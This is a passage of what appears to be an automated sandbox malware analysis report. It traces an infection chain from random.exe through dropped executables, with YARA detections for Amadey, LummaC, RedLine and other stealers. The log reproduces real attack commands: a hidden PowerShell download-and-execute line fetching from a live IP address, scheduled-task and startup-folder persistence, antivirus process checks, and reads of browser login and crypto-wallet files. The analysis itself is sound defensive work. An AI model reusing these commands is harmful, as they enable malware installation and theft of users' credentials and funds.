                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00481201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00481201
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00462BA5 KiUserCallbackDispatcher,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00462BA5
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0048B226 SendInput,keybd_event,0_2_0048B226
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_004A22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_004A22DA
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn zhvFsmabDCl /tr "mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta" /sc minute /mo 25 /ru "user" /fJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;Jump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE "C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE" Jump to behavior
                                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE "C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE" Jump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXEProcess created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe" Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe "C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe "C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Ae.msi Ae.msi.bat & Ae.msi.bat
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\expand.exe expand Ae.msi Ae.msi.bat
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 789919
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Deviation.msi
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Brian" Challenges
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 789919\Occupation.com + Kate + Invisible + Tells + Gross + Amend + Foul + Snowboard + Digital + Fraud 789919\Occupation.com
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Drug.msi + ..\Contributors.msi + ..\Anthropology.msi + ..\Activities.msi + ..\Opens.msi + ..\Having.msi + ..\Dimension.msi + ..\Responding.msi + ..\Series.msi + ..\Salem.msi q
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\789919\Occupation.com Occupation.com q
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comProcess created: unknown unknown
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeProcess created: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe "C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeProcess created: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe "C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\edugeniusx.url" & echo url="c:\users\user\appdata\local\edugenius studios co\edugeniusx.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\edugeniusx.url" & exit
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\edugeniusx.url" & echo url="c:\users\user\appdata\local\edugenius studios co\edugeniusx.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\edugeniusx.url" & exit
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00480B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00480B62
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00481663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00481663
                                    Source: random.exe, Snowboard.37.dr, EduGeniusX.com.41.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                                    Source: random.exeBinary or memory string: Shell_TrayWnd
                                    Source: rapes.exe, rapes.exe, 0000000E.00000002.3642183042.0000000000233000.00000040.00000001.01000000.00000011.sdmp, rapes.exe, 00000016.00000002.1699197808.0000000000233000.00000040.00000001.01000000.00000011.sdmp, rapes.exe, 00000019.00000002.2294579206.0000000000233000.00000040.00000001.01000000.00000011.sdmpBinary or memory string: |Program Manager
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00440698 cpuid 0_2_00440698
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10141780101\yUI6F6C.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10141780101\yUI6F6C.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10141790101\ADFoyxP.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10141800101\zY9sqWs.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10141800101\zY9sqWs.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10141810101\CgmaT61.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10141810101\CgmaT61.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10141820101\mAtJWNv.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10141820101\mAtJWNv.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10141830101\PfOHmro.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10141830101\PfOHmro.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0047D21C GetLocalTime,0_2_0047D21C
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0047D27A GetUserNameW,0_2_0047D27A
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0045B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_0045B952
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_004242DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004242DE
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                                    Source: Amcache.hve.54.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                                    Source: Amcache.hve.54.drBinary or memory string: msmpeng.exe
                                    Source: Amcache.hve.54.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                                    Source: Amcache.hve.54.drBinary or memory string: MsMpEng.exe
                                    Source: V0Bt74c.exe, 00000033.00000002.3542112240.0000000000FE6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Windows Defender\MsMpeng.exe
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                                    Stealing of Sensitive Information

                                    barindex
                                    Yara detected Amadey
                                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                                    Yara detected Amadeys Clipper DLL
                                    Source: Yara matchFile source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000D.00000003.1272817646.0000000004830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000B.00000002.1267517499.0000000000311000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000C.00000002.1304814909.0000000000311000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000016.00000003.1658838706.0000000004850000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000001B.00000003.2852612840.00000000050F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000E.00000002.3640463719.0000000000031000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000019.00000002.2294441553.0000000000031000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000001B.00000002.2894622115.0000000000031000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000C.00000003.1251271116.0000000004B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000B.00000003.1226965278.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000019.00000003.2254111649.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000E.00000003.1272781808.0000000004CA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000016.00000002.1699111613.0000000000031000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\zY9sqWs[1].exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\10141800101\zY9sqWs.exe, type: DROPPED
                                    Yara detected LummaC Stealer
                                    Source: Yara matchFile source: Process Memory Space: V0Bt74c.exe PID: 4860, type: MEMORYSTR
                                    Source: Yara matchFile source: 51.2.V0Bt74c.exe.400000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 49.2.V0Bt74c.exe.3549550.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 51.2.V0Bt74c.exe.400000.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000033.00000002.3513079723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000031.00000002.3270950302.0000000003549000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mAtJWNv[1].exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\10141820101\mAtJWNv.exe, type: DROPPED
                                    Yara detected RedLine Stealer
                                    Source: Yara matchFile source: dump.pcap, type: PCAP
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mAtJWNv[1].exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\10141820101\mAtJWNv.exe, type: DROPPED
                                    Found many strings related to Crypto-Wallets (likely being stolen)
                                    Source: V0Bt74c.exe, 00000033.00000002.3541523690.0000000000F8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
                                    Source: V0Bt74c.exe, 00000033.00000002.3541523690.0000000000F8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                                    Source: V0Bt74c.exe, 00000033.00000002.3541523690.0000000000F8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                                    Source: V0Bt74c.exe, 00000033.00000002.3541523690.0000000000F8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: pcgpfmipidbgpenhmajoajpbobppdil","ez":"Sui"},{"en":"aholpfdialjgjfhomihkjbmgjidlcdno","ez":"ExodusWeb3"}-
                                    Source: V0Bt74c.exe, 00000033.00000002.3541523690.0000000000F8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                                    Source: powershell.exe, 00000005.00000002.1221252142.0000000007660000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
                                    Tries to harvest and steal browser information (history, passwords, etc)
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
